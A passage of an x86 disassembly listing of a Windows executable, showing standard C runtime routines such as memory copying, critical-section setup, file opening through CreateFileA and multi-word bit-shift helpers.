; sub_41BAF0+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41BAF0 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_413E46
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_41BBC8: ; DATA XREF: sub_41BBD8:loc_41BC1A�o
push dword ptr [esp+4]
call ds:dword_41F128 ; InitializeCriticalSection
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBD8 proc near ; CODE XREF: sub_4167CF+26�p
; sub_416882+49�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 10h
push offset stru_428578
call __SEH_prolog
mov eax, dword_47A1B4
test eax, eax
jnz short loc_41BC24
cmp dword_479E5C, 1
jz short loc_41BC1A
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_41F078 ; GetModuleHandleA
test eax, eax
jz short loc_41BC1A
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call ds:dword_41F074 ; GetProcAddress
mov dword_47A1B4, eax
test eax, eax
jnz short loc_41BC24
loc_41BC1A: ; CODE XREF: sub_41BBD8+1C�j
; sub_41BBD8+2B�j
mov eax, offset loc_41BBC8
mov dword_47A1B4, eax
loc_41BC24: ; CODE XREF: sub_41BBD8+13�j
; sub_41BBD8+40�j
and [ebp+ms_exc.disabled], 0
push [ebp+arg_4]
push [ebp+arg_0]
call eax ; InitializeCriticalSectionAndSpinCount
mov [ebp+var_1C], eax
jmp short loc_41BC59
; ---------------------------------------------------------------------------
loc_41BC35: ; DATA XREF: .rdata:stru_428578�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41BC43: ; DATA XREF: .rdata:stru_428578�o
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_20], 0C0000017h
jnz short loc_41BC57
push 8
call ds:dword_41F154 ; RtlSetLastWin32Error
loc_41BC57: ; CODE XREF: sub_41BBD8+75�j
xor eax, eax
loc_41BC59: ; CODE XREF: sub_41BBD8+5B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_41BBD8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BC70 proc near ; CODE XREF: sub_4169A5+2DE�p
; sub_417EF6+13�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41BC90
cmp edi, eax
jb loc_41BE0C
loc_41BC90: ; CODE XREF: sub_41BC70+16�j
test edi, 3
jnz short loc_41BCAC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41BCCC
rep movsd
jmp ds:off_41BDBC[edx*4]
; ---------------------------------------------------------------------------
loc_41BCAC: ; CODE XREF: sub_41BC70+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41BCC4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41BCCC+4[eax*4]
; ---------------------------------------------------------------------------
loc_41BCC4: ; CODE XREF: sub_41BC70+46�j
jmp dword ptr ds:loc_41BDCC[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41BCCC: ; CODE XREF: sub_41BC70+31�j
; sub_41BC70+8E�j ...
jmp ds:off_41BD50[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41BCDD+3
; ---------------------------------------------------------------------------
or al, 0BDh
inc ecx
add [eax], dh
loc_41BCDD: ; DATA XREF: sub_41BC70+64�o
mov ebp, 0D1230041h
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41BCCC
rep movsd
jmp ds:off_41BDBC[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41BCCC
rep movsd
jmp ds:off_41BDBC[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41BCCC
rep movsd
jmp ds:off_41BDBC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41BD50 dd offset loc_41BDB3 ; DATA XREF: sub_41BC70:loc_41BCCC�r
dd offset loc_41BDA0
dd offset loc_41BD98
dd offset loc_41BD90
dd offset loc_41BD88
dd offset loc_41BD80
dd offset loc_41BD78
dd offset loc_41BD70
; ---------------------------------------------------------------------------
loc_41BD70: ; CODE XREF: sub_41BC70:loc_41BCCC�j
; DATA XREF: sub_41BC70+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41BD78: ; CODE XREF: sub_41BC70:loc_41BCCC�j
; DATA XREF: sub_41BC70+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41BD80: ; CODE XREF: sub_41BC70:loc_41BCCC�j
; DATA XREF: sub_41BC70+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41BD88: ; CODE XREF: sub_41BC70:loc_41BCCC�j
; DATA XREF: sub_41BC70+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41BD90: ; CODE XREF: sub_41BC70:loc_41BCCC�j
; DATA XREF: sub_41BC70+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41BD98: ; CODE XREF: sub_41BC70:loc_41BCCC�j
; DATA XREF: sub_41BC70+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41BDA0: ; CODE XREF: sub_41BC70:loc_41BCCC�j
; DATA XREF: sub_41BC70+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41BDB3: ; CODE XREF: sub_41BC70:loc_41BCCC�j
; DATA XREF: sub_41BC70:off_41BD50�o
jmp ds:off_41BDBC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41BDBC dd offset loc_41BDCC ; DATA XREF: sub_41BC70+35�r
; sub_41BC70+92�r ...
dd offset loc_41BDD4
dd offset loc_41BDE0
dd offset loc_41BDF4
; ---------------------------------------------------------------------------
loc_41BDCC: ; CODE XREF: sub_41BC70+35�j
; sub_41BC70+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41BDD4: ; CODE XREF: sub_41BC70+35�j
; sub_41BC70+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41BDE0: ; CODE XREF: sub_41BC70+35�j
; sub_41BC70+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41BDF4: ; CODE XREF: sub_41BC70+35�j
; sub_41BC70+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41BE0C: ; CODE XREF: sub_41BC70+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41BE40
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41BE34
std
rep movsd
cld
jmp ds:off_41BF58[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41BE34: ; CODE XREF: sub_41BC70+1B5�j
; sub_41BC70+210�j ...
neg ecx
jmp ds:off_41BF08[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41BE40: ; CODE XREF: sub_41BC70+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41BE58
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_41BE58+4[eax*4]
; ---------------------------------------------------------------------------
loc_41BE58: ; CODE XREF: sub_41BC70+1DA�j
; DATA XREF: sub_41BC70+1E1�r
jmp ds:off_41BF58[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_41BE6C
dd offset loc_41BE90
dd offset loc_41BEB8
; ---------------------------------------------------------------------------
loc_41BE6C: ; DATA XREF: sub_41BC70+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_41BE34
std
rep movsd
cld
jmp ds:off_41BF58[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41BE90: ; DATA XREF: sub_41BC70+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41BE34
std
rep movsd
cld
jmp ds:off_41BF58[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41BEB8: ; DATA XREF: sub_41BC70+1F8�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41BE34
std
rep movsd
cld
jmp ds:off_41BF58[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41BF0C
dd offset loc_41BF14
dd offset loc_41BF1C
dd offset loc_41BF24
dd offset loc_41BF2C
dd offset loc_41BF34
dd offset loc_41BF3C
off_41BF08 dd offset loc_41BF4F ; DATA XREF: sub_41BC70+1C6�r
; ---------------------------------------------------------------------------
loc_41BF0C: ; DATA XREF: sub_41BC70+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41BF14: ; DATA XREF: sub_41BC70+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41BF1C: ; DATA XREF: sub_41BC70+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41BF24: ; DATA XREF: sub_41BC70+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41BF2C: ; DATA XREF: sub_41BC70+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41BF34: ; DATA XREF: sub_41BC70+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41BF3C: ; DATA XREF: sub_41BC70+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41BF4F: ; CODE XREF: sub_41BC70+1C6�j
; DATA XREF: sub_41BC70:off_41BF08�o
jmp ds:off_41BF58[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41BF58 dd offset loc_41BF68 ; DATA XREF: sub_41BC70+1BB�r
; sub_41BC70:loc_41BE58�r ...
dd offset loc_41BF70
dd offset loc_41BF80
dd offset loc_41BF94
; ---------------------------------------------------------------------------
loc_41BF68: ; CODE XREF: sub_41BC70+1BB�j
; sub_41BC70:loc_41BE58�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41BF70: ; CODE XREF: sub_41BC70+1BB�j
; sub_41BC70:loc_41BE58�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41BF80: ; CODE XREF: sub_41BC70+1BB�j
; sub_41BC70:loc_41BE58�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41BF94: ; CODE XREF: sub_41BC70+1BB�j
; sub_41BC70:loc_41BE58�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41BC70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BFAD proc near ; CODE XREF: sub_41C294+28�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_C]
push ebx
push esi
xor esi, esi
test dl, dl
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], esi
jns short loc_41BFD1
mov [ebp+var_14], esi
mov [ebp+var_1], 10h
jmp short loc_41BFDC
; ---------------------------------------------------------------------------
loc_41BFD1: ; CODE XREF: sub_41BFAD+19�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41BFDC: ; CODE XREF: sub_41BFAD+22�j
mov eax, 8000h
test edx, eax
jnz short loc_41BFF6
test dh, 40h
jnz short loc_41BFF2
cmp dword_47A298, eax
jz short loc_41BFF6
loc_41BFF2: ; CODE XREF: sub_41BFAD+3B�j
or [ebp+var_1], 80h
loc_41BFF6: ; CODE XREF: sub_41BFAD+36�j
; sub_41BFAD+43�j
push 3
mov eax, edx
pop ebx
and eax, ebx
sub eax, esi
jz short loc_41C019
dec eax
jz short loc_41C010
dec eax
jnz short loc_41C034
mov [ebp+var_10], 0C0000000h
jmp short loc_41C020
; ---------------------------------------------------------------------------
loc_41C010: ; CODE XREF: sub_41BFAD+55�j
mov [ebp+var_10], 40000000h
jmp short loc_41C020
; ---------------------------------------------------------------------------
loc_41C019: ; CODE XREF: sub_41BFAD+52�j
mov [ebp+var_10], 80000000h
loc_41C020: ; CODE XREF: sub_41BFAD+61�j
; sub_41BFAD+6A�j
cmp ecx, 10h
jz short loc_41C065
cmp ecx, 20h
jz short loc_41C05C
cmp ecx, 30h
jz short loc_41C053
cmp ecx, 40h
jz short loc_41C04E
loc_41C034: ; CODE XREF: sub_41BFAD+58�j
call sub_417C70
mov dword ptr [eax], 16h
call sub_417C79
mov [eax], esi
or eax, 0FFFFFFFFh
jmp loc_41C245
; ---------------------------------------------------------------------------
loc_41C04E: ; CODE XREF: sub_41BFAD+85�j
mov [ebp+var_8], ebx
jmp short loc_41C068
; ---------------------------------------------------------------------------
loc_41C053: ; CODE XREF: sub_41BFAD+80�j
mov [ebp+var_8], 2
jmp short loc_41C068
; ---------------------------------------------------------------------------
loc_41C05C: ; CODE XREF: sub_41BFAD+7B�j
mov [ebp+var_8], 1
jmp short loc_41C068
; ---------------------------------------------------------------------------
loc_41C065: ; CODE XREF: sub_41BFAD+76�j
mov [ebp+var_8], esi
loc_41C068: ; CODE XREF: sub_41BFAD+A4�j
; sub_41BFAD+AD�j ...
mov eax, edx
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
push edi
mov edi, 100h
jg short loc_41C0AF
jz short loc_41C0AA
cmp eax, esi
jz short loc_41C0AA
cmp eax, edi
jz short loc_41C0A1
cmp eax, 200h
jz short loc_41C0DB
cmp eax, 300h
jnz short loc_41C0C1
mov [ebp+var_C], 2
jmp short loc_41C0EB
; ---------------------------------------------------------------------------
loc_41C0A1: ; CODE XREF: sub_41BFAD+DB�j
mov [ebp+var_C], 4
jmp short loc_41C0EB
; ---------------------------------------------------------------------------
loc_41C0AA: ; CODE XREF: sub_41BFAD+D3�j
; sub_41BFAD+D7�j
mov [ebp+var_C], ebx
jmp short loc_41C0EB
; ---------------------------------------------------------------------------
loc_41C0AF: ; CODE XREF: sub_41BFAD+D1�j
cmp eax, 500h
jz short loc_41C0E4
cmp eax, 600h
jz short loc_41C0DB
cmp eax, edx
jz short loc_41C0E4
loc_41C0C1: ; CODE XREF: sub_41BFAD+E9�j
call sub_417C70
mov dword ptr [eax], 16h
call sub_417C79
mov [eax], esi
loc_41C0D3: ; CODE XREF: sub_41BFAD+2E2�j
or eax, 0FFFFFFFFh
jmp loc_41C244
; ---------------------------------------------------------------------------
loc_41C0DB: ; CODE XREF: sub_41BFAD+E2�j
; sub_41BFAD+10E�j
mov [ebp+var_C], 5
jmp short loc_41C0EB
; ---------------------------------------------------------------------------
loc_41C0E4: ; CODE XREF: sub_41BFAD+107�j
; sub_41BFAD+112�j
mov [ebp+var_C], 1
loc_41C0EB: ; CODE XREF: sub_41BFAD+F2�j
; sub_41BFAD+FB�j ...
mov eax, [ebp+arg_C]
test eax, edi
mov esi, 80h
jz short loc_41C109
mov ecx, dword_479E58
not ecx
and ecx, [ebp+arg_10]
test cl, cl
js short loc_41C109
xor esi, esi
inc esi
loc_41C109: ; CODE XREF: sub_41BFAD+148�j
; sub_41BFAD+157�j
test al, 40h
jz short loc_41C124
or byte ptr [ebp+var_10+2], 1
or esi, 4000000h
cmp dword_479E5C, 2
jnz short loc_41C124
or [ebp+var_8], 4
loc_41C124: ; CODE XREF: sub_41BFAD+15E�j
; sub_41BFAD+171�j
test ah, 10h
jz short loc_41C12B
or esi, edi
loc_41C12B: ; CODE XREF: sub_41BFAD+17A�j
test al, 20h
jz short loc_41C137
or esi, 8000000h
jmp short loc_41C141
; ---------------------------------------------------------------------------
loc_41C137: ; CODE XREF: sub_41BFAD+180�j
test al, 10h
jz short loc_41C141
or esi, 10000000h
loc_41C141: ; CODE XREF: sub_41BFAD+188�j
; sub_41BFAD+18C�j
call sub_41B841
mov edi, eax
or ebx, 0FFFFFFFFh
cmp edi, ebx
jnz short loc_41C169
call sub_417C70
mov dword ptr [eax], 18h
call sub_417C79
and dword ptr [eax], 0
loc_41C162: ; CODE XREF: sub_41BFAD+208�j
mov eax, ebx
jmp loc_41C244
; ---------------------------------------------------------------------------
loc_41C169: ; CODE XREF: sub_41BFAD+1A0�j
mov eax, [ebp+arg_0]
push 0
push esi
push [ebp+var_C]
mov dword ptr [eax], 1
mov eax, [ebp+arg_4]
mov [eax], edi
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
push [ebp+var_10]
push [ebp+arg_8]
call ds:dword_41F03C ; CreateFileA
mov esi, eax
cmp esi, ebx
jz short loc_41C1A8
push esi
call ds:dword_41F1AC ; GetFileType
test eax, eax
jnz short loc_41C1B7
push esi
call ds:dword_41F034 ; CloseHandle
loc_41C1A8: ; CODE XREF: sub_41BFAD+1E7�j
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
call sub_417C82
pop ecx
jmp short loc_41C162
; ---------------------------------------------------------------------------
loc_41C1B7: ; CODE XREF: sub_41BFAD+1F2�j
cmp eax, 2
jnz short loc_41C1C2
or [ebp+var_1], 40h
jmp short loc_41C1CB
; ---------------------------------------------------------------------------
loc_41C1C2: ; CODE XREF: sub_41BFAD+20D�j
cmp eax, 3
jnz short loc_41C1CB
or [ebp+var_1], 8
loc_41C1CB: ; CODE XREF: sub_41BFAD+213�j
; sub_41BFAD+218�j
push esi
push edi
call sub_41B670
or [ebp+var_1], 1
mov eax, edi
sar eax, 5
lea ebx, ds:47A2E0h[eax*4]
mov eax, edi
and eax, 1Fh
lea esi, [eax+eax*8]
mov al, [ebp+var_1]
pop ecx
pop ecx
mov ecx, [ebx]
shl esi, 2
mov [ebp+var_1], al
and [ebp+var_1], 48h
mov [esi+ecx+4], al
jnz short loc_41C22D
test al, al
jns short loc_41C22D
test byte ptr [ebp+arg_C], 2
jz short loc_41C22D
push 2
push 0FFFFFFFFh
push edi
call sub_419BC9
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41C249
call sub_417C79
cmp dword ptr [eax], 83h
jnz short loc_41C288
loc_41C22D: ; CODE XREF: sub_41BFAD+252�j
; sub_41BFAD+256�j ...
cmp [ebp+var_1], 0
jnz short loc_41C242
test byte ptr [ebp+arg_C], 8
jz short loc_41C242
mov eax, [ebx]
lea eax, [esi+eax+4]
or byte ptr [eax], 20h
loc_41C242: ; CODE XREF: sub_41BFAD+284�j
; sub_41BFAD+28A�j
mov eax, edi
loc_41C244: ; CODE XREF: sub_41BFAD+129�j
; sub_41BFAD+1B7�j
pop edi
loc_41C245: ; CODE XREF: sub_41BFAD+9C�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41C249: ; CODE XREF: sub_41BFAD+271�j
and [ebp+var_2], 0
push 1
lea eax, [ebp+var_2]
push eax
push edi
call sub_417536
add esp, 0Ch
test eax, eax
jnz short loc_41C276
cmp [ebp+var_2], 1Ah
jnz short loc_41C276
push [ebp+var_10]
push edi
call sub_41D96E
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_41C288
loc_41C276: ; CODE XREF: sub_41BFAD+2B1�j
; sub_41BFAD+2B7�j
push 0
push 0
push edi
call sub_419BC9
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_41C22D
loc_41C288: ; CODE XREF: sub_41BFAD+27E�j
; sub_41BFAD+2C7�j
push edi
call sub_416304
pop ecx
jmp loc_41C0D3
sub_41BFAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C294 proc near ; CODE XREF: sub_417B08+137�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset stru_428588
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
mov ecx, [ebp+arg_8]
call sub_41BFAD
add esp, 14h
mov [ebp+var_24], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41C2D9
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_41C294 endp
; =============== S U B R O U T I N E =======================================
sub_41C2D9 proc near ; CODE XREF: sub_41C294+37�p
; DATA XREF: .rdata:stru_428588�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_41C2E8
push dword ptr [ebp-20h]
call sub_41B81F
pop ecx
locret_41C2E8: ; CODE XREF: sub_41C2D9+4�j
retn
sub_41C2D9 endp
; =============== S U B R O U T I N E =======================================
sub_41C2E9 proc near ; CODE XREF: sub_41C368+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 20h
pop ecx
cdq
idiv ecx
push 1Fh
pop ecx
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
mov ecx, [esp+arg_0]
not edx
test [ecx+eax*4], edx
jz short loc_41C311
loc_41C308: ; CODE XREF: sub_41C2E9+26�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C30B: ; CODE XREF: sub_41C2E9+2C�j
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41C308
loc_41C311: ; CODE XREF: sub_41C2E9+1D�j
inc eax
cmp eax, 3
jl short loc_41C30B
xor eax, eax
inc eax
retn
sub_41C2E9 endp
; =============== S U B R O U T I N E =======================================
sub_41C31B proc near ; CODE XREF: sub_41C368+42�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push edi
push 20h
pop ecx
cdq
idiv ecx
mov edi, [esp+8+arg_0]
mov esi, eax
lea eax, [edi+esi*4]
push eax
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
push edx
push dword ptr [eax]
call sub_41DAA9
add esp, 0Ch
dec esi
js short loc_41C365
lea edi, [edi+esi*4]
loc_41C34C: ; CODE XREF: sub_41C31B+48�j
test eax, eax
jz short loc_41C365
push edi
push 1
push dword ptr [edi]
call sub_41DAA9
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_41C34C
loc_41C365: ; CODE XREF: sub_41C31B+2C�j
; sub_41C31B+33�j
pop edi
pop esi
retn
sub_41C31B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C368 proc near ; CODE XREF: sub_41C489+79�p
; sub_41C489+C2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
dec edi
push 20h
lea eax, [edi+1]
pop ecx
cdq
idiv ecx
push 1Fh
pop esi
sub esi, edx
xor edx, edx
inc edx
mov ecx, esi
shl edx, cl
mov ebx, eax
mov eax, [ebp+arg_0]
test [eax+ebx*4], edx
jz short loc_41C3B7
lea ecx, [edi+1]
push ecx
push eax
call sub_41C2E9
test eax, eax
pop ecx
pop ecx
jnz short loc_41C3B4
push edi
push [ebp+arg_0]
call sub_41C31B
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_41C3B4: ; CODE XREF: sub_41C368+3C�j
mov eax, [ebp+arg_0]
loc_41C3B7: ; CODE XREF: sub_41C368+2C�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax+ebx*4], edx
inc ebx
cmp ebx, ecx
jge short loc_41C3D2
lea edi, [eax+ebx*4]
sub ecx, ebx
xor eax, eax
rep stosd
loc_41C3D2: ; CODE XREF: sub_41C368+5F�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41C368 endp
; =============== S U B R O U T I N E =======================================
sub_41C3DA proc near ; CODE XREF: sub_41C489+6D�p
; sub_41C489+AC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push 3
pop edx
sub ecx, eax
push esi
loc_41C3E8: ; CODE XREF: sub_41C3DA+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_41C3E8
pop esi
retn
sub_41C3DA endp
; =============== S U B R O U T I N E =======================================
sub_41C3F5 proc near ; CODE XREF: sub_41C489+4D�p
arg_0 = dword ptr 4
xor eax, eax
loc_41C3F7: ; CODE XREF: sub_41C3F5+10�j
mov ecx, [esp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41C40B
inc eax
cmp eax, 3
jl short loc_41C3F7
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41C40B: ; CODE XREF: sub_41C3F5+A�j
xor eax, eax
retn
sub_41C3F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C40E proc near ; CODE XREF: sub_41C489+B6�p
; sub_41C489+D0�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
pop esi
cdq
mov ecx, esi
idiv ecx
mov ebx, [ebp+arg_0]
or edi, 0FFFFFFFFh
mov [ebp+arg_4], esi
mov ecx, edx
shl edi, cl
mov [ebp+var_8], eax
xor eax, eax
sub [ebp+arg_4], edx
not edi
mov [ebp+var_4], eax
loc_41C43C: ; CODE XREF: sub_41C40E+51�j
mov esi, [ebx+eax*4]
mov ecx, esi
and ecx, edi
mov [ebp+var_C], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+arg_4]
or esi, [ebp+var_4]
mov [ebx+eax*4], esi
mov esi, [ebp+var_C]
shl esi, cl
inc eax
cmp eax, 3
mov [ebp+var_4], esi
jl short loc_41C43C
push 2
pop eax
mov ecx, eax
sub ecx, [ebp+var_8]
lea ecx, [ebx+ecx*4]
loc_41C46C: ; CODE XREF: sub_41C40E+74�j
cmp eax, [ebp+var_8]
jl short loc_41C478
mov edx, [ecx]
mov [ebx+eax*4], edx
jmp short loc_41C47C
; ---------------------------------------------------------------------------
loc_41C478: ; CODE XREF: sub_41C40E+61�j
and dword ptr [ebx+eax*4], 0
loc_41C47C: ; CODE XREF: sub_41C40E+68�j
dec eax
sub ecx, 4
test eax, eax
jge short loc_41C46C
pop edi
pop esi
pop ebx
leave
retn
sub_41C40E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C489 proc near ; CODE XREF: sub_41C5E1+D�p
; sub_41C5F7+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
